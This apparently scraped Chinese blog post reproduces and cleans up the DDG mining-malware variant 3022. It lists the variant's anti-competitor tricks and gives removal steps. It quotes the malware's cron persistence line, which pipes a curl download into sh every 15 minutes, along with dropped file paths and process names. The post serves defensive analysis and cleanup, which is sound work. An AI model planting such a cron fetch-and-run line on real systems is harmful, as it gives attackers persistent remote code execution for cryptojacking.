本篇文章主要根據360netlab新出的ddg分析文件來復現新變種3022,會涉及部分分析和清除的方法,
本篇文章只用於學習交流,為廣大受害者提供清除思路 ,請勿用於非法用途,產生一切後果與作者無關
詳情請參考文件:
(i.sh名稱位ddgs一貫的作風)
把同類的挖礦程序放到了這個指令碼中,來殺掉yilu、以及billgate家族的gates程序等
不過這都是之前版本的,現在這個更高階了,直接下發二進位制程式disable
目前為了阻止其它挖礦程式ddg3022主要做了以下措施
1.修改hosts檔案,阻止其它挖礦程式的下發
2.殺掉其它挖礦程式
3.使用二進位制檔案disable
接下來執行指令碼開始我們的復現過程,crontab已經寫入
cpu已經滿載,挖礦程式已經在執行
看下/tmp目錄下的樣本檔案
老套路,挖礦木馬幹什麼咱們反著來就是了
刪除/var/spool/cron/crontab/root,/var/spool/cron/root檔案中echo "*/15 * * * * curl -fssl | sh" >> /var/spool/cron/root
刪除/tmp/6tx3wq,/tmp/disable,/usr/bin/lrnbbce
kill掉程序:6tx3wq,lrnbbce
此時挖礦程式已經清理,後續可以刪除被增加的hosts等檔案
DDG全家桶之3022
本篇文章主要根據360netlab新出的ddg分析文件來復現新變種3022,會涉及部分分析和清除的方法,本篇文章只用於學習交流,為廣大受害者提供清除思路 請勿用於非法用途,產生一切後果與作者無關 詳情請參考文件 i.sh名稱位ddgs一貫的作風 把同類的挖礦程序放到了這個指令碼中,來殺掉yilu 以...
Vue全家桶之vuex
目錄 簡化方法 模組巢狀 vuex原理剖析 vuex 是乙個專為 vue.js 應用程式開發的狀態管理模式。它採用集中式儲存管理應用的所有元件的狀態。它是響應式的。安裝vue add vuex使用 import vue from vue import vuex from vuex vue.use v...
集合全家桶
介面提供了整個集合框架最通用的增刪改查以及集合自身操作的抽象方法,讓子類去實現 set 介面決定了它的子類都是無序 無重複元素的集合,其主要實現有hashset treeset linkedhashset。hashset 底層採用 hashmap 實現,而 treeset 底層使用 treemap ...